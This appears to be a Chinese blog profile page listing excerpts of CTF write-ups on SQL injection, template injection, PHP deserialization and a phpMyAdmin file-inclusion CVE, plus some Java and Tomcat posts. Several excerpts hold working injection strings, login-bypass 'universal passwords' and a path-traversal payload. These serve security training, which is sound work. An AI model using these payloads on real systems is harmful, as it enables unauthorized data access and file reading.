2 marsxu626

尚未进行身份认证

我要认证

暂无相关简介

等级
TA的排名 13w+

CTF模板注入

模板注入赛题1. [护网杯 2018]easy_tornado进入后三个链接/flag.txt # flag in /fllllllllllllag/welcome.txt #提示render(渲染)/hint.txt #提示md5(cookie_secret+md5(filename))url上两个参数:filename&filehash根据提示,要查看flag,已经知道了文件名,filehash也知道了构

2020-07-30 01:04:07

[BUUCTF][GYCTF2020]Ezsqli

[GYCTF2020]Ezsqli布尔盲注无列名盲注抓包,存在post的id参数。进行测试id=1时, :Nu1Lid=0时, :Error Occured When Fetch Result.id=1’时, :bool(false)id=1’#时,:bool(false)语句不正确时返回bool(false)所以猜测是数字型的注入id=1^1 :Error Occured When Fetch Result.id=1^0 :Nu1L存在sql注入。

2020-07-26 03:31:58

[buuctf][RCTF2015]EasySQL

[RCTF2015]EasySQL进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。注册admin\,登陆进去后修改密码,结果出现报错。可以看到原语句中的username是双引号闭合的,所以单引号注册的账号是不起作用的.由此推断,我们注册admin"#因为闭合语句且将后面进行了注释,所以是可以sql语句会变为

2020-07-26 00:49:41

sqli_labs(11-20)练习

POST注入less11post类型一个登陆框试一下万能密码:uname=admin’ or ‘1’='1–+&passwd=1显示出Your Login name:adminYour Password:admin所以猜测sql语句是:$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";注入如下(同对id的注入方法):u..

2020-07-22 01:16:16

sqli_lab(less1-10)解题方法

GET注入less1:?id=1’ #报错?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常?id=1’ order by 3–+ #正常?id=-1’ union select 1,2,3–+ #2为显示位?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+?id=-1’

2020-07-19 00:30:44

[BUUCTF刷题]HardSQL

HardSQL进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。也过滤了空格,使用括号绕过。首先,注数据库名称username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1然后得到表名(过滤=,使用like)userna

2020-07-03 00:29:42

[BUUCTF刷题]我有一个数据库

我有一个数据库cve-2018-12613-PhpMyadmin后台文件包含进去后出现乱码的文字,扫描目录发现/phpmyadmin发现其版本为phpmyadmin4.18,搜索相关版本的漏洞。利用poctarget=db_datadict.php%253f/../../../../../../../../flag漏洞分析:问题在index.php的55~63:// If we have a valid target, let's load that script instead

2020-07-02 22:57:41

buuctf_[CISCN2019 华北赛区 Day2 Web1]Hack World

Hack World进入后提示是sql注入,并且给了表和列名。进行fuzz测试,过滤了很多字符。主要的union字符被过滤,但select,from没有被过滤。我们还发现id只有输入1,2时分别返回Hello, glzjin wants a girlfriend.,Do you want to be my girlfriend?。并且支持异或判断。所以可以进行布尔盲注读取数据。id=0^(ascii(substr((select(flag)from(flag)),1,1))&gt

2020-07-02 16:24:58

buuctf_安洵杯 2019_easy_web

安洵杯 2019_easy_web进入后页面显示如下查看源代码:发现一长串base64编码的数据,然后进行解码发现是png图片的内容信息。地址.../index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=对TXpVek5UTTFNbVUzTURabE5qYz0进行两次base64解密,一次hex2bin解密得到555.png。想必上面显示的那张图片就是555.png,然后源代码里面显示的数据就是该图片的内容,即在参数img中输入一次he

2020-07-01 23:09:27

[BUUCTF刷题]禁止套娃

禁止套娃exp=show_source(next(array_reverse(scandir(pos(localeconv())))));exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));exp=show_source(session_id(session_start()));进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git

2020-07-01 16:48:09

java绘制C/S架构的网络绘图版

java绘制C/S架构的网络绘图版1. 服务端程序Server.javaimport java.net.ServerSocket;import java.net.Socket;public class Server extends Thread { public void run(){ createServer(); } public void createServer(){ try { ServerSocket serverSocket = new Serv

2020-06-23 00:31:53

防灾科技学院GKCTF2020_misc wp

GKCTF_20200x01 签到0x02 问卷调查0x03 Pokémon0x04 code obfuscation0x01 签到比赛直播间地址:https://live.bilibili.com/772947屏幕上有flag;0x02 问卷调查填写对这次比赛的问卷调查,就可以得到flag。flag{I_W4nt_t0_Fu4k_GKCTF}0x03 Pokémon一个.gba格式的文件,下载Visual Boy Advance打开;是一个叫 口袋怪兽绿宝石的游戏。没办法,

2020-05-25 16:47:08

在Windows上部署Tomcat

在Windows上部署Tomcat准备:1. JDK:jdk-8u131-windows-x642 tomcat:apache-tomcat-8.5.23-windows-x64.zip一:安装jdk和tomcat。(JDK)下载连接: https://www.oracle.com/java/technologies/javase-downloads.html(Tomcat)下载链接:https://tomcat.apache.org/download-80.cgi二: 将tomcat解压

2020-05-11 13:50:20

2020网鼎杯_青龙组

2020网鼎杯青龙组0x01 misc_签到题0x02 WEB1_AreUSerialz0x03 WEB_filejava0x01 misc_签到题有必要说一下签到题,进去后是一个答题的模式,可能大家觉得答几道后还不出flag就会失望,或者转去其他地方找突破口。但是每次答完后它会给你一个称谓,可能你答对题数越高地位称呼会越高,最终能拿到flag吧。作对15道后会出现提交Token的提示框。提交本队的token后,可以F12得到flag。或者用bp抓包,当提交后才能抓到包。所以明显看到就是给/f

2020-05-11 00:10:10

2020 DASCTF四月春季战-Web

0x01 Esunserialize构造反序列化Pop链字符逃逸上源码:<?phpshow_source("index.php");function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);}function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);}

2020-05-09 23:29:51

2019全国大学生信息安全竞赛—Web

0x01 JustSosoparse_url的解析漏洞_wakeup()绕过序列化pop链的构造php引用赋值打开页面后查看源代码:提示为本地文件包含漏洞,查看index.php和hint.php.index.php:<?phperror_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"];if(!isset($file)){ echo 'Missing parameter'.'<

2020-05-09 14:45:23

[MRCTF2020]Ezpop—序列化pop链

Ezpop序列化Pop链利用几个类之间相互关联进行构造文件包含漏洞Modifier类中append函数使用了include(),会出现文件包含漏洞。以下是题目内容:Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%

2020-05-09 13:12:11

buuctf online_tool

online_tool进去后得到以上页面,其中设置X-Forwarded-For或者不设置不影响题目,它只是设置命名,$sandbox为目录名。代码实现的功能就是在线进行namp扫描,通过get一个host主域名进行扫描。对上面出现的nmap命令进行了解:-T5 : 可以加快或者减慢扫描速度,有六个级别,级别越高速度越快,也越容易被WAF或者IDS发现。-sT:使用TCP Syn...

2020-04-29 20:49:27

2020 DASCTF四月春季战-misc

misc0x01 签到题5G都来了,6G还远吗?6G下还需要开会员才能高速下载吗?请提交 DASCTF{} 里的内容。下载发现有将近1G。作为签到题应该不需要这样做。按下F12,接收到payload。payload如下:REFTQ1RGe3dlbGNvbWVfdG9fREFTX0FwMXIxfc9Vo4jQqwH4ON+olEgxiijIjbgcdJur4VZjq9WlhUI...

2020-04-26 13:36:30

[极客大挑战2019]easysql

easysql进入后这样的页面,正常用’会报错,然后用burp扫一下。尽然就出来了!原来要用万能密码就行了,现在总结一下 万能密码:aspaspx万能密码1:"or “a”="a2:‘.).or.(’.a.’=’.a3:or 1=1–4:'or 1=1–5:a’or’ 1=1–6:"or 1=1–7:'or.‘a.’...

2020-04-22 23:44:09

查看更多

勋章 我的勋章
  • 签到新秀
    签到新秀
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv2
    勤写标兵Lv2
    授予每个自然周发布4篇到6篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。
  • 分享达人
    分享达人
    成功上传6个资源即可获取